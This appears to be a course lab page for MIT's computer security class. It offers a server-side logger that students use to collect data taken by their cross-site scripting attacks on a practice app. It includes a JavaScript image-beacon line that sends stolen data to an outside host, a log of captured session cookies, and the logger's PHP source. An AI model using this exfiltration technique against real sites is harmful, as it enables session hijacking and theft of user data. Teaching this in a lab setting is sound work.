You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.5660/2023/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Sat, 18 Oct 2025 10:34:37 +0000: 1: grader/CHRCCHFUHFVL Sat, 18 Oct 2025 10:28:16 +0000: 1: grader/HRLUAAZQIPSQ Sat, 18 Oct 2025 10:27:45 +0000: 1: grader/REKWDZDPSLDN Sat, 18 Oct 2025 10:27:20 +0000: 1: grader/PXJCPBJHDWQJ Sat, 18 Oct 2025 10:23:51 +0000: 1: grader/TEQYBECIPIXF Sat, 18 Oct 2025 10:18:53 +0000: 1: grader/GWCRYJTAKPGR Sat, 18 Oct 2025 10:15:21 +0000: 1: 1#2 Sat, 18 Oct 2025 10:13:42 +0000: 1: grader/WUZKNZFAZBAT Sat, 18 Oct 2025 10:13:01 +0000: 1: grader/PHGVUINYHCYO Sat, 18 Oct 2025 10:07:44 +0000: 1: grader#YPKAMLQTOLPM Sat, 18 Oct 2025 10:06:09 +0000: 1: grader#MSNUIGVCBNTT Sat, 18 Oct 2025 10:05:05 +0000: 1: 1#2 Sat, 18 Oct 2025 10:04:49 +0000: 1: 1#2 Sat, 18 Oct 2025 10:04:01 +0000: 1: 1#2 Sat, 18 Oct 2025 10:02:19 +0000: 1: grader#BOVGJYOORAYG Sat, 18 Oct 2025 10:01:37 +0000: 1: 2 Sat, 18 Oct 2025 09:58:59 +0000: 1: grader#UUFLOOJUADRQ Sat, 18 Oct 2025 09:57:49 +0000: 1: grader#KRMCZTGPFRRD Sat, 18 Oct 2025 09:57:26 +0000: 1: grader#OVDVJYNERPZZ Sat, 18 Oct 2025 09:57:12 +0000: 1: grader#BGRLDOUZSGIJ Sat, 18 Oct 2025 09:55:27 +0000: 1: grader#VCGNNAERAEAA Sat, 18 Oct 2025 09:46:04 +0000: 1: 1#2 Sat, 18 Oct 2025 09:23:35 +0000: 1: PyZoobarLogin=grader#60f268a53ad49483b7f8ccbd605f403fdbac711ce426440f6a798f85c409288f Sat, 18 Oct 2025 09:23:25 +0000: 1: PyZoobarLogin=grader#f095caab5c8307bcf72f2bf7b14592da6d6c6c6ab8e75d4d1af624e0aa6faf35 Sat, 18 Oct 2025 09:17:59 +0000: 1: PyZoobarLogin=grader#36ace0bba0401c4267e4285de8674690e4df3bf74eac62e3986af663439e6126 Sat, 18 Oct 2025 09:17:50 +0000: 1: PyZoobarLogin=grader#1c31f7861b3a8932404358d6352ae5fdcdfacfd27ecd15b1cbe425628ddebb46 Sat, 18 Oct 2025 09:17:35 +0000: 1: PyZoobarLogin=grader#78c5f2efcfb37cef6f58c20063d6ccbd6af9cd81bd87644b50727d0c9198e3d3 Sat, 18 Oct 2025 09:10:56 +0000: 1: PyZoobarLogin=grader#0649e478e2a0175562af91c2b20fd172946c95fc3dca57d2e82da0ad286a935e Sat, 18 Oct 2025 09:10:48 +0000: 1: PyZoobarLogin=grader#a90d7a84e02c3c5072960770e41f13ff5026111bc7281b2759e01c87541e7fc7 Sat, 18 Oct 2025 09:10:28 +0000: 1: PyZoobarLogin=grader#910f356db3f7106fd3422a0970175d422971a6096c1b44492937a368e7889117 Sat, 18 Oct 2025 08:53:59 +0000: 1: PyZoobarLogin=grader#f668153da1d44d3e26235730069369de90ea1cd94ed5db490db08f25dacf1aec Sat, 18 Oct 2025 08:53:51 +0000: 1: PyZoobarLogin=grader#41ec61c8a6317ad644284c3538853debb0d5644094800909cda2b9218b32cf54 Sat, 18 Oct 2025 08:53:36 +0000: 1: PyZoobarLogin=grader#9a98a53f2bcaec5944536de3517d98ad682baf7c282d6029f7f83c4ba36f505b Sat, 18 Oct 2025 08:42:07 +0000: 1: PyZoobarLogin=grader#4f3d8dde8bec7ffc862f4ec67fe0f22db3148dc585a5102d48c4b39300c142fb Sat, 18 Oct 2025 08:29:17 +0000: 1: PyZoobarLogin=grader#d4d337d9d64494962ff36e8a623791446688e85f1f5848d38d628c89e06c6a4f Sat, 04 Oct 2025 12:21:42 +0000: 1: PyZoobarLogin=1#cf5292bbfe6ec22d6886e8fcaed7408eb4b130282e9599f43a1245a941081286 Sat, 04 Oct 2025 12:08:36 +0000: 1: PyZoobarLogin=1#cf5292bbfe6ec22d6886e8fcaed7408eb4b130282e9599f43a1245a941081286 Sat, 04 Oct 2025 11:57:40 +0000: 1: PyZoobarLogin=1#cf5292bbfe6ec22d6886e8fcaed7408eb4b130282e9599f43a1245a941081286 Sat, 04 Oct 2025 11:57:16 +0000: 1: PyZoobarLogin=1 Sat, 04 Oct 2025 11:57:06 +0000: 1: PyZoobarLogin=1 Sat, 04 Oct 2025 11:40:33 +0000: 1: 2
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.5660-2023-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.5660/2023/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.5660-2023-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>